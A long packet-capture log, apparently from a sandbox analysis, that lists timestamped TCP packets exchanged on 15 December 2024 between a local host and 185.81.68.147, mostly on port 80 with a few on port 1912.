                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.045929909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.046611071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.046705008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.046798944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.047445059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.047535896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.047605038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.048369884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.048443079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.048485994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.049087048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.049210072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.049278975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.050019026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.050097942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.050134897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.050790071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.050964117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.051003933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.051615953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.051706076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.051743031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.052445889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.052570105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.052630901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.053293943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.053416014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.053457022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.054092884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.054202080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.054240942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.054945946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.055069923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.055108070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.055799961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.055911064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.055955887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.056591034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.056715965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.056756020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.057478905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.057701111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.057744980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.058504105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.058587074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.058630943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.059101105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.059206963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.059248924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.059946060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.060086966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.060148001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.061024904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.061093092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.061135054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.061774015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.061897993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.061939001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.062495947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.062587023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.062628984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.063222885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.072813034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.072891951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.072912931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.073254108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.073302031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.073431015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.074034929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.074075937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.074147940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.074918985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.074959993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.076363087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.076462030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.076500893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.076845884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.076998949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.077038050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.077611923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.077696085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.077735901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.078408003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.078536987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.078569889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.079267979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.079451084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.079490900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.080090046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.080200911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.080238104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.080914021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.080980062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.081017971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.085853100 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.094753027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.220304012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.220402956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.220535040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.220588923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.220813036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.220884085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.221460104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.221564054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.222284079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.222333908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.222387075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.223252058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.223357916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.223491907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.223531961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.223957062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.224049091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.224091053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.224912882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.225132942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.225176096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.225744009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.225878954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.226445913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.226495028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.226536989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.226768970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.227297068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.227430105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.227489948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.228090048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.228184938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.228239059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.228935003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.229060888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.229775906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.229798079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.229892015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.230613947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.230657101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.230710983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.231446981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.231502056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.231554031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.231623888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.232327938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.232392073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.232433081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.233098984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.233192921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.233234882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.233944893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.234071016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.234791994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.234838963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.234890938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.235624075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.235677004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.235723972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.235760927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.236452103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.236581087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.236623049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.237287998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.237385988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.237426996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.238203049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.238276005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.238806009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.238970041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.239087105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.239929914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.240015030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.240016937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.240052938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.240638018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.240735054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.240775108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.241444111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.241548061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.241588116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.242296934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.242372036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.242434978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.243331909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.243432045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.243473053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.244236946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.244405031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.245053053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.245117903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.245178938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.245819092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.245867968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.245927095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.245965958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.246536016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.246711016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.246766090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.247276068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.247395039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.247442961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.248126984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.248174906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.248971939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.249032021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.249087095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.249886990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.249934912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.249950886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.249990940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.250636101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.250763893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.250806093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.251487970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.251605034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.251652956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.252275944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.252373934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.253123045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.253182888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.253259897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.253947973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.254017115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.254080057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.254132032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.254815102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.254880905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.254923105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.255587101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267142057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267191887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267307043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267374992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267446041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267532110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267703056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267756939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.267800093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.268357992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.268428087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.268501997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.269567966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.269660950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.269701004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.269853115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.269915104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.269978046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.270450115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.270489931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.270536900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.270921946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.270965099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.270999908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.271740913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.271783113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.271826982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.272567034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.272666931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.272723913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.273538113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.273601055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.273655891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.399965048 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.412619114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.412753105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.412867069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.413007021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.413218975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.413295984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.413809061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.413927078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.414752007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.414796114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.414882898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.415987968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.416033030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.416091919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.416131973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.416676044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.416723967 CET8049709185.81.68.147192.168.2.8
